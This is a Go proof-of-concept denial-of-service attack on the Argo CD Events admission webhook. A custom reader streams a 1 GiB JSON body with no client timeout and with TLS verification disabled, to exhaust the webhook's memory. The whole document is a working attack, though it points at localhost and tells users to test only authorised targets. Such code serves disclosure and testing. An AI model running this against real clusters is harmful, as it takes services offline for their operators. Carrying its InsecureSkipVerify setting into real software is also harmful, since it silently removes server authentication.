Argo CD Events Admission Webhook DoS PoC
package main | |
import ( | |
"crypto/tls" | |
"io" | |
"net/http" | |
) | |
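// DummyJSONReader is an io.Reader that streams a syntactically valid JSON
// object of exactly `size` bytes without ever materialising it in memory:
//
//	{"data":"xxxx…x"}
//
// The point of the PoC is asymmetry: the client pays almost nothing to emit a
// multi-gigabyte body, while a webhook that buffers or decodes the whole
// request pays for all of it.
type DummyJSONReader struct {
	size int64 // Total number of bytes the stream yields, framing included.
	read int64 // Bytes handed out so far; the stream is at EOF once read == size.
}

// Compile-time check that the type satisfies the interface the HTTP client needs.
var _ io.Reader = (*DummyJSONReader)(nil)

// dummyPrefix and dummySuffix frame the filler so the stream parses as JSON.
// Any payload shorter than the frame cannot be a valid object, so Read rounds
// such sizes up to dummyFrame bytes rather than emitting something malformed.
const (
	dummyPrefix = `{"data":"`
	dummySuffix = `"}`
	dummyFrame  = len(dummyPrefix) + len(dummySuffix) // 11 bytes of framing
)

// Read copies the next chunk of the stream into p and reports how many bytes
// it wrote. It returns (0, io.EOF) once the whole document has been produced.
//
// Unlike a naive implementation it makes no assumption about len(p): the
// prefix and suffix are copied piecewise, so a one-byte buffer, or a buffer
// whose end lands in the middle of the closing `"}`, is handled without
// indexing past p. A zero-length p yields (0, nil), which the io.Reader
// contract permits.
func (r *DummyJSONReader) Read(p []byte) (n int, err error) {
	total := r.size
	if total < int64(dummyFrame) {
		// Too small for a valid object; emit the minimal one instead.
		total = int64(dummyFrame)
	}
	if r.read >= total {
		return 0, io.EOF
	}

	fillEnd := total - int64(len(dummySuffix)) // offset of the first suffix byte
	for n < len(p) && r.read < total {
		switch {
		case r.read < int64(len(dummyPrefix)):
			// Leading frame: copy whatever part of it is still pending.
			c := copy(p[n:], dummyPrefix[r.read:])
			n += c
			r.read += int64(c)
		case r.read < fillEnd:
			// Filler: as many 'x' as both fit in p and remain before the suffix.
			want := fillEnd - r.read
			if rem := int64(len(p) - n); rem < want {
				want = rem
			}
			chunk := p[n : n+int(want)] // want <= len(p)-n, so this fits an int
			for i := range chunk {
				chunk[i] = 'x'
			}
			n += int(want)
			r.read += want
		default:
			// Trailing frame, possibly split across calls.
			c := copy(p[n:], dummySuffix[r.read-fillEnd:])
			n += c
			r.read += int64(c)
		}
	}
	return n, nil
}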
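// main POSTs a single, very large streamed JSON body to the endpoint under
// test and prints whatever comes back. It is a proof of concept for a
// client-side-cheap / server-side-expensive request against an admission
// webhook; run it only against a target you are authorised to test.
func main() {
	// Size of the streamed body. The original comment claimed 16 GB but the
	// arithmetic below is 2^30, i.e. 1 GiB; the value is kept and the comment
	// corrected. Raise it if the target survives, bearing in mind the client
	// streams it synchronously.
	payloadSize := int64(1) * 1024 * 1024 * 1024 // 1 GiB (2^30 bytes)
	reader := &DummyJSONReader{size: payloadSize}

	// Deliberately no client timeout: shipping the full body over a loopback
	// or port-forward takes longer than any sensible default.
	//
	// InsecureSkipVerify is tolerable ONLY because the target is a local,
	// self-signed test endpoint. Do not carry this into anything that talks
	// to a real cluster: it silently disables server authentication.
	httpClient := &http.Client{
		Timeout: 0,
		Transport: &http.Transport{
			TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
		},
	}

	// The body is an opaque io.Reader, so no Content-Length is known up front
	// and the transport should stream it with chunked transfer encoding. Point
	// the URL at the admission webhook endpoint under test.
	req, err := http.NewRequest("POST", "https://localhost:6443/", reader)
	if err != nil {
		panic(err)
	}
	req.Header.Set("Content-Type", "application/json")

	resp, err := httpClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	println("Response status code:", resp.StatusCode)

	// Cap the response read: the server under test is untrusted and may
	// answer with an arbitrarily large (or never-ending) body. The PoC is
	// meant to exhaust the target's memory, not the tester's.
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	if err != nil {
		panic(err)
	}
	println("Response body:", string(body))
}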